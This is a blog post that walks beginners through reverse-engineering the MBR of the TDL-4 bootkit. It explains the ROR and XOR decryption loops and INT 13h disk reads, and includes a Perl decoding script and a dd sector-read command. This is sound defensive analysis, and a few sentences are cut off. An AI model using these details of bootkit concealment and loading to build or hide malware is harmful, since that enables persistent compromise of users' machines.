The next step will be to create a perl script to decrypt the hard disk sectors and come up with the next set of instructions. Specifically, we will be analyzing how the INT 13 Hooking is being implemented!!!! and how the malicious kernel-level drivers are loaded before the OS starts.
Currently I am swamped with other stuff but I will try to dedicate some hours in the near future. Meanwhile, please share any thoughts.
Thanks.
Goal:
Personally, every time I read a blog post from the AV guys, I find it hard to follow because it is too technical. That is fine for those who work on malware analysis on a daily basis, but what about the community that wants to get started in this field? They need a step-by-step process to enter this area and, most importantly, to get interested. That is the idea of this "101 Approach" series... to learn from scratch!!!
Introduction:
I started analyzing the rootkit/bootkit known as TDSS:TDL-4. At the beginning I had no idea about the behavior of this threat, so I started gathering information from the community and ended up with an excellent article from Kaspersky explaining this new variant. When I started studying that article, I realized the writers got straight to the point (as expected) and skipped many details of the analysis.
The intent of this "101 Approach" series is to document the "gray areas" not described in those technical articles, and to mention the differences found in the sample I have in my lab, so that even if you are a beginner in this field and not a technical guru, you will still be able to follow the internals of this bootkit.
For the purpose of this analysis, these are the key points to keep in mind about MBR:
1. The MBR is assembly code stored at the first sector of the hard disk (offset 0000). A sector contains 512 bytes and therefore this is the size of the MBR code.
2. The MBR is used to load the active partition, which contains the boot instructions to load the Operating System.
3. The BIOS will load the MBR block (512 bytes) into memory at offset 7C00.
4. The BIOS transfers execution to the MBR after loading it into memory.
Analyzing MBR code:
Varios Files-> Binary/Raw File option
And very important, when IDA Pro asks "Do you want to disassemble it as 32 bit code?"
Click "NO" since MBR code is 16-bit code (bp instead of ebp, sp instead of esp, and so on).
Another point to consider, once the code is loaded into IDA, go to the first assembly instruction and hit letter "C" (to set the Entry Point) so that IDA can analyze the code and create the proper assembly operands, otherwise you will see cod
The image below shows the extract
What this code does is copy the MBR code itself from memory location 7C00h to 600h. This is done because later on the MBR code will load the Boot Sector of the Active Partition into the same area of memory (7C00h) that the MBR was first loaded into.
Basically, the code uses the movsb instruction to move one single byte at a time from SI = 7C00h to DI = 600h. In order to move 512 bytes, the CX register is used as the counter (200h = 512d), and the REP (repeat) prefix loops until the whole sector has been copied into the new location.
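If it helps to see the relocation in a higher-level language, here is a minimal Python sketch of what rep movsb does in this case. It is only a model: the function name and the 64 KB bytearray standing in for real-mode memory are my own assumptions, and the segment registers are assumed to be 0.

```python
def rep_movsb(memory, si, di, cx):
    """Model `rep movsb` with the direction flag cleared: copy CX bytes, one at a time."""
    while cx != 0:
        memory[di] = memory[si]   # movsb: copy one byte from [SI] to [DI]
        si += 1                   # both pointers advance by one byte
        di += 1
        cx -= 1                   # rep: decrement CX and repeat until it reaches 0


# Hypothetical 64 KB of memory with a fake 512-byte "MBR" placed at 7C00h.
memory = bytearray(0x10000)
memory[0x7C00:0x7E00] = bytes(i & 0xFF for i in range(0x200))

rep_movsb(memory, si=0x7C00, di=0x600, cx=0x200)
relocated = bytes(memory[0x600:0x800])
```

After the call, the 512 bytes at 600h are an exact copy of the sector at 7C00h, which leaves 7C00h free to be overwritten later.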
Decrypting MBR code:
By looking at the next instructions within the MBR sector, we confirmed the bootkit was using a basic ROR (rotate right) method to obfuscate/encrypt some code, as explained in the Kaspersky blog. Let's analyze how this obfuscation works and the address space affected. Below is the chunk of code that implements the decryption routine:
Before starting our analysis, make a note of the instructions starting at offset 2A: those are currently encrypted, and you will see the difference below once they are decrypted. So far, those instructions make no sense, right?
0021: BP is set to 62Ah, the offset in memory where the ROR will start decrypting the data. If you remember, the MBR copied itself to 600h, which means the encrypted code is located 2Ah bytes past that address, right after the loop instruction.
0024: ROR instruction will be executed ag
0028: Loop until CL becomes 0 and therefore the loop ends (loop instruction decrements CX by default).
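The loop just described can be sketched in a few lines of Python. This is a rough model under one assumption: each byte is rotated right by the current value of CL (the low byte of the CX counter), and CX is decremented on every pass. The function names are hypothetical.

```python
def ror8(value, count):
    """Rotate an 8-bit value right by `count` bits."""
    count %= 8                        # rotating a byte by a multiple of 8 is a no-op
    return ((value >> count) | (value << (8 - count))) & 0xFF


def ror_decrypt(image, start, cx):
    """Rotate `cx` bytes starting at offset `start`, using CL as the rotation count."""
    out = bytearray(image)
    offset = start
    while cx != 0 and offset < len(out):
        cl = cx & 0xFF                # CL is the low 8 bits of CX
        out[offset] = ror8(out[offset], cl)
        offset += 1                   # move to the next encrypted byte
        cx -= 1                       # the loop instruction decrements CX
    return bytes(out)


# Example call for this sample (file name taken from this post):
# decoded = ror_decrypt(open("MBR-dump.raw", "rb").read(), 0x2A, 0x132)
```

Since a byte only has 8 bit positions, rotating by CL is the same as rotating by CL modulo 8, which is why the sketch can use a single shift instead of a bit-by-bit loop.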
*NOTE: In order to avoid "pattern recognition", Malware creators change the registers and/or keys of the malicious code. If you compare the decryption routine described by the Kaspersky guys with mine, you will notice one change: the decryption key/size is different:
Kaspersky: CX = 137h
Mine: CX = 132h
You could try to decrypt the whole chunk by applying the ROR to every single byte by hand, but that is tedious and prone to errors, so I took the opportunity to create a simple Perl script (Regalado-ROR.pl) to do the ROR decryption for us.
Basically what my script expects as parameters are:
- The image/raw file being analyzed.
- The CX value (in this case 132h).
- The BP value (offset to start decrypting).
Regalado-ROR.pl will create an output file called "testiculo.bin" (don't ask me what this means in Spanish LoL) with the chunk of code decrypted; you can then open this file in IDA Pro to keep analyzing further instructions.
So, the way I executed the script was:
./Regalado-ROR.pl -f MBR-dump.raw -k 132 -o 2A
Outputfile = testiculo.bin
The image below shows the new raw file created by Regalado-ROR.pl with the decrypted instructions starting at offset 2A, which NOW make more sense: you can start seeing "int 13h" (explained later) and the ldr16 string mentioned by Kaspersky.
The Regalado-ROR.pl script is shown below, for you to use with new variants of TDL-4.
#!/usr/bin/perl
# Regalado-ROR.pl implementation to unencrypt MBR
# Author: Daniel Regalado aka Danux Mitnick from Neza to the World!!!!
# Email: danuxx at gmail.com
# Date: 03/11/2011 - 3:36 AM
use strict;
use warnings;
use Getopt::Std;

my %args;
getopts('f:k:o:', \%args);
if (!defined($args{'k'}) or !defined($args{'f'}) or !defined($args{'o'})) {
    print "\n\tUsage: Regalado-ROR.pl -f <raw file> -k <CX value in hex> -o <BP offset in hex>\n";
    exit(0);
}

my @main;                    # Array which contains the raw encrypted chunk (as hex strings)
my $file = $args{'f'};
load_file();                 # Let's load the raw file into @main array.
my @dec = @main;             # Array which contains the raw decoded chunk
my $key = hex($args{'k'});   # Loop counter (CX), given in hex
my $off = hex($args{'o'});   # Offset of the first encrypted byte, given in hex

for (1 .. $key) {
    # Keep only the low 8 bits of the key (the CL register)
    my $cl = $key & 0b11111111;
    $key--;
    $dec[$off] = ror(hex($main[$off]), $cl);
    $off++;
}
write_file(@dec);            # Write decoded chunk to be analyzed by IDA Pro

sub ror {
    # Usage: ror(number, n)
    # Rotate the 8-bit 'number' by 'n' bits right
    my $number      = shift;
    my $bits2rotate = shift;
    for (1 .. $bits2rotate) {
        # Get right-most bit
        my $rmb = $number & 0b00000001;
        # Shift right 1 bit
        $number = $number >> 1;
        # Set left-most bit if the right-most bit of the number was == 1
        if ($rmb == 1) {
            $number = $number | 0b10000000;
        }
    }
    return sprintf("%02x", $number);
}

# Writes the array that holds the raw file to the file system.
# Param 1: array that holds the raw file (as hex strings)
sub write_file {
    my @final = @_;
    open(FILE2, ">testiculo.bin") or die $!;
    binmode(FILE2);
    for my $n (0 .. $#final) {
        print FILE2 sprintf("%c", hex($final[$n]));
    }
    close(FILE2);
}

# Reads the raw file byte by byte into @main, one hex string per byte.
sub load_file {
    open(FILE, "<$file") or die $!;
    binmode(FILE);
    @main = ();
    my $char = "";
    my $i = 0;
    while (1) {
        $char = getc(FILE);
        $main[$i] = sprintf("%02x", ord($char));
        if (eof(FILE)) {
            last;
        }
        $i += 1;
    }
    close(FILE);
}
# END of Script
Understanding decrypted code:
The next step is to understand what the decrypted code is going to do. As per the Kaspersky blog: "The main function of the MBR loader, which is small in size, is to search the rootkit’s encrypted partition for the ldr16 component, load it into RAM and pass control to it."
But again, let's analyze this "gray area", since there are many internal steps before reaching that conclusion.
The main feature to understand here is interrupt 13h (INT 13), which provides different functions to read, write, lock, unlock, eject, etc., hard disks and removable media. There are two types of INT 13h:
1. The legacy INT 13
- Which was designed in the early 1980's.
- The maximum theoretical capacity (disk size) of this API is 8.4 GB.
- Uses function numbers 1-15h and is Cylinder-Head-Sector (CHS) oriented.
2. The Extended INT 13
- Replaces CHS addressing with Logical Block Addressing (LBA).
- Gives the BIOS better control over how this data is used.
- Uses function numbers 41h-48h.
- It uses a data structure called "Disk Address Packet".
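As a side note, the 8.4 GB limit of the legacy interface can be reproduced with simple arithmetic. The short Python sketch below assumes the usual register layout of legacy INT 13h (10 bits for the cylinder, 8 bits for the head and 6 bits for the sector) and 512-byte sectors; the variable names are my own.

```python
BYTES_PER_SECTOR = 512

# Legacy INT 13h passes a CHS address in registers with fixed bit widths.
max_cylinders = 2 ** 10              # 10-bit cylinder number: 1024 values
max_heads = 2 ** 8                   # 8-bit head number: 256 values
max_sectors_per_track = 2 ** 6 - 1   # 6-bit sector number, counted from 1: 63 values

max_sectors = max_cylinders * max_heads * max_sectors_per_track
max_bytes = max_sectors * BYTES_PER_SECTOR
print(max_sectors, max_bytes)        # 16515072 8455716864
```

That is roughly 8.4 GB, which is why a disk like the one analyzed here needs LBA and the extended functions.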
We will concentrate our analysis on the second option, the Extended INT 13 interface, since our Malware uses functions 42h and 48h to commit its malicious actions.
The article "Enhanced Disk Drive Specification (EDDS)" details all the features of this interface, as well as the "Disk Address Packet" structure mentioned above. Moving forward, let's analyze the first chunk of the decrypted data. You will notice that INT 13 is being called with the extension passed via the AH register, in this case 48h, which means Get Drive Parameters. See image below:
Extension 48h - Get Drive parameters:
:003C - AH is set to the extension number required, in this case 48h.
:003E - Offset in memory to store the result buffer. The result buffer is where all the parameters of the hard disk will be stored, and it is explained in detail in the EDDS article.
:0041 - Maximum buffer size: Located at offset 0 (86Fh).
As explained above, the result buffer will be loaded starting at memory offset 86Fh. Sixteen bytes ahead of this offset (at 87Fh) is the 8-byte value holding the number of sectors of the disk. By reviewing the memory dump of the affected system (image below), we confirm that this value is 9502F90.
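To make the offsets easier to follow, here is a small Python sketch that pulls the sector count out of a result buffer. The field layout is my reading of the EDD result buffer (first 26 bytes), and the sample buffer is synthetic: only the sector count comes from the memory dump, the rest of the values are made up.

```python
import struct

# Assumed little-endian layout of the first 26 bytes of the AH=48h result buffer:
# size, flags, cylinders, heads, sectors per track,
# total sectors (8 bytes at offset 10h), bytes per sector.
DRIVE_PARAMS = struct.Struct("<HHIIIQH")


def total_sectors(result_buffer):
    """Return the 8-byte sector count stored at offset 10h of the buffer."""
    fields = DRIVE_PARAMS.unpack_from(result_buffer, 0)
    return fields[5]


# Synthetic buffer for the example; in memory it would start at 86Fh.
sample = DRIVE_PARAMS.pack(0x1A, 0, 0, 0, 0, 0x9502F90, 512)
print(hex(total_sectors(sample)))    # 0x9502f90
```

With the buffer at 86Fh, offset 10h lands on 87Fh, the address discussed above.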
But, wait a second, why does the Malware need the hard disk parameters?
Response: The total number of sectors of the hard disk is going to be a parameter used by the INT 13 extension 42h to know the last sector to be loaded in memory! See next section for more details.
So, let's analyze the INT 13 with the extension 42h, which means, load data from disk into memory.
Decryption Process - Function sub_76 Extension 42h - Load disk data into memory
The function sub_76 (the name assigned by IDA) contains the logic to decrypt the sectors stored on the hard disk. As an overview, the main steps of this function are shown below:
1. Load the next sector from disk to memory.
2. Decrypt the sector loaded (via XOR function).
3. Copy the decrypted chunk to another section in memory.
4. Is this the last sector to be copied? If not, go to point 1.
5. If yes, jump to the offset of the decrypted code in memory.
You will need to check the EDDS article to understand the parameters required for this extension.
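For orientation while reading the EDDS article, the packet that extension 42h expects can be sketched in Python as follows. The layout is my reading of the 16-byte packet from the specification; the buffer address 88Dh and the LBA 9502F59 are values from this analysis, while the sector count of 1 and the helper name build_dap are assumptions made only for the example.

```python
import struct

# Assumed layout of the 16-byte address packet used by INT 13h / AH=42h (little-endian):
#   +0  packet size (10h)       +1  reserved (0)
#   +2  number of sectors       +4  transfer buffer offset, +6 buffer segment
#   +8  starting LBA (8 bytes)
DAP = struct.Struct("<BBHHHQ")


def build_dap(sector_count, buf_offset, buf_segment, lba):
    """Pack the fields into the 16 bytes the BIOS reads from DS:SI."""
    return DAP.pack(DAP.size, 0, sector_count, buf_offset, buf_segment, lba)


packet = build_dap(sector_count=1, buf_offset=0x88D, buf_segment=0, lba=0x9502F59)
print(packet.hex())
```

If the packet sits at 85Fh in memory, offset 2 corresponds to 861h and offset 8 to 867h, which are the addresses that show up in the code explanation.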
Note: To help in your calculations, DS = 0.
Code explanation:
007C: Number of sectors to transfer. It is set at offset 2 of the Device Address Packet, which corresponds to offset 861h in memory.
0086: Address of transfer buffer: the address where the sector will be loaded in memory: 88Dh.
008C - 009B: Starting logical block address (LBA): the sector from disk to be loaded. The 8-byte address is copied from offset 87Fh to 867h in memory via push and pop instructions.
By looking at the memory dump we found this LBA value: 000009502F59 at offset 8 (867h). That does not mean this is the only one; actually, my assumption is that this is the last one copied from disk to memory (we confirm this below). Keep in mind that the Malware will load different sectors from disk to memory.
So, as explained above (see section 2.1), we confirmed that the last sector of the hard disk is the first one loaded in memory; in our case the value is 9502F90 hex = 156250000 dec.
00A2: Every time a sector is going to be loaded in memory, the total number of sectors is reduced by the value of EAX (1, 2, 3 and so on); this way, some sectors from the disk (starting from the final one) are copied to memory in every loop.
00A7: The four higher bytes of the LBA address are decremented by 1 when the previous subtraction generates a borrow. The sbb instruction is used since we are dealing with 16 bit registers and therefore we need to take care of the borrow when a negative number is reached.
To better understand this, see the example below, where a value is split into a high half and a low half:
High = 876D
Low = 0000
If 1 is subtracted from Low, it will generate a borrow.
Low = 0000 - 0001 = FFFF; since this generates a borrow, High needs to be decremented by one:
High = 876D - 1 = 876C, which is what sbb High, 0 does.
Final result: 876CFFFF - Got it????????
In our code shown in the figure above, the four higher bytes start at offset 86B since the value is stored in little-endian order.
00AF: INT 13h uses a structure called "Device Address Packet", whose location in memory is given by DS:SI. Here we can see the offset is 85Fh.
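The borrow handling explained for offset 00A7 can also be checked with a few lines of Python. This is only a sketch of the sub/sbb pair: the function name and the bits parameter are my own, and it assumes the value being subtracted fits in one half.

```python
def sub_with_borrow(high, low, n, bits=16):
    """Subtract n from a value stored as two halves, the way a sub + sbb pair does."""
    mask = (1 << bits) - 1
    borrow = 1 if low < n else 0        # sub sets the carry flag when it has to borrow
    new_low = (low - n) & mask          # the low half wraps around
    new_high = (high - borrow) & mask   # sbb high, 0 subtracts only the borrow
    return new_high, new_low


high, low = sub_with_borrow(0x876D, 0x0000, 1)
print("%04X%04X" % (high, low))         # 876CFFFF
```

The same helper with bits=32 reproduces the LBA seen in the dump: taking 37h away from 9502F90 leaves the high half untouched and gives 9502F59 in the low half.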
Quick note:
a) Number of bytes per sector of your hard disk: can be found by looking at the hard disk properties (you can use the Linux command dmesg to get this info). In our case this value is 512 bytes per sector.
b) Number of sectors per disk: via the dmesg command, or: total bytes of hard disk / 512.
NOTE - LBA:
"With LBA, instead of referring to a drives cylinder, head and sector number geometry in order to access or "address" it, each sector is assigned a unique "sector number". In essence, LBA is a means by which a drive is accessed by linearly addressing sector addresses, beginning at sector 1 of head 0, cylinder 0 as LBA 0, and proceeding on in sequence to the last physical sector on the drive, which, for instance, on a standard 540 Meg drive would be LBA 1,065,456." by http://www.dewassoc.com/kbase/hard_drives/lba.htm
Below is the memory dump showing the confirmation of the new values identified:
Something to keep in mind is that the LBA address found in memory was 09502F59 and the last sector is 09502F90; this could be the range copied (backwards) from disk to memory. We will confirm this later.
Quick tip - Getting sectors with the dd tool:
dd if=/dev/sdb bs=512 skip=156249945 count=2 > out
Where 156249945d = 09502F59h, the block detected in memory.
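If you prefer to script this step, the same idea can be sketched in Python: convert the hex LBA to decimal and seek to LBA * 512 in the disk or image. The helper read_sectors and the tiny temporary image are assumptions so that the example runs without a real disk.

```python
import os
import tempfile

SECTOR_SIZE = 512


def read_sectors(path, lba, count=1, sector_size=SECTOR_SIZE):
    """Read `count` sectors starting at sector `lba` from a disk or raw image."""
    with open(path, "rb") as disk:
        disk.seek(lba * sector_size)     # same job as dd's skip= with bs=512
        return disk.read(count * sector_size)


print(int("09502F59", 16))               # 156249945, the value to give to skip=

# Tiny stand-in image (4 sectors, each filled with its own index).
with tempfile.NamedTemporaryFile(delete=False) as image:
    image.write(b"".join(bytes([n]) * SECTOR_SIZE for n in range(4)))
chunk = read_sectors(image.name, lba=2, count=2)
os.remove(image.name)
```

On the real system the path would be the device or a full disk image, and lba would be 0x09502F59.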
Decrypt the sector loaded (via XOR function)
Once the encrypted sectors have been loaded in memory, the fun part begins: the code related to the decryption process, as shown below:
00C4: The code will zero out all the bytes from offset 75D through 85C. Why only 100h (256) bytes? Because the loop is driven by the BL register, which is 8 bits wide; after FFh the next value would be 100h (BH=01, BL=00), which sets BL to 0 and ends the loop. From 00CC to 00ED the same range (75D - 85C) is filled with different values based on multiple calculations.
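The wrap-around of BL is easy to verify with a small Python model. It assumes the loop simply increments BL after each write and stops when BL wraps to zero (the exact instructions are in the image, so treat this as a sketch); the junk-filled bytearray stands in for memory.

```python
memory = bytearray(b"\xAA" * 0x1000)   # hypothetical memory, pre-filled with junk

BASE = 0x75D
bl = 0
iterations = 0
while True:
    memory[BASE + bl] = 0          # zero one byte of the table
    iterations += 1
    bl = (bl + 1) & 0xFF           # BL is 8 bits wide: FFh + 1 wraps to 00h
    if bl == 0:                    # the wrap to zero ends the loop
        break

print(iterations, hex(BASE + 0xFF))    # 256 0x85c
```

The last byte written is at 75Dh + FFh = 85Ch, so the bytes right after it (85D and 85E) are left untouched by this loop.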
Decryption loop:
In the first two instructions of the code below we can see that, since the last byte affected by the previous code (see above) was at offset 85C, the next bytes to be changed are at offsets 85D and then 85E. This shows how the bootkit prepares the bytes to be used during the decryption process.
The decryption loop starts at offset 0109. Some calculations are performed to derive the encryption key, which is stored in register CL, and finally, at instruction 012B, the XOR is executed against the content SI is pointing to, which is (see above) offset 88D, where the first byte from disk was loaded. A sector of 512 bytes is decrypted as expected; we can confirm this by checking the value of register DX, which is the counter of this loop and is set to 200h (512 bytes) at instruction 00FA.
Jumping to the decrypted code in Memory
Once all the sectors loaded from disk have been decrypted in memory, it is time to jump to the new instructions. In the code below we can see two important things:
1. 060 - 067: Decrypted code is moved from SI (893h) to DI (calculated at runtime) CX number of times. Here is where the decrypted code is placed in memory; this step happens every time one sector has been decrypted.
2. 069 - 071: Depending on the value at offset 891h in memory, the code will call the decryption function again if more sectors need to be decrypted; otherwise it will jump to the decrypted code in memory.
Next Steps
The next step will be to create a Perl script to decrypt the hard disk sectors and come up with the next set of instructions. Specifically, we will be analyzing how the INT 13 hooking is implemented!!!! and how the malicious kernel-level drivers are loaded before the OS starts.
Currently I am swamped with other stuff but I will try to dedicate some hours in the near future. Meanwhile, please share any thoughts.
Thanks.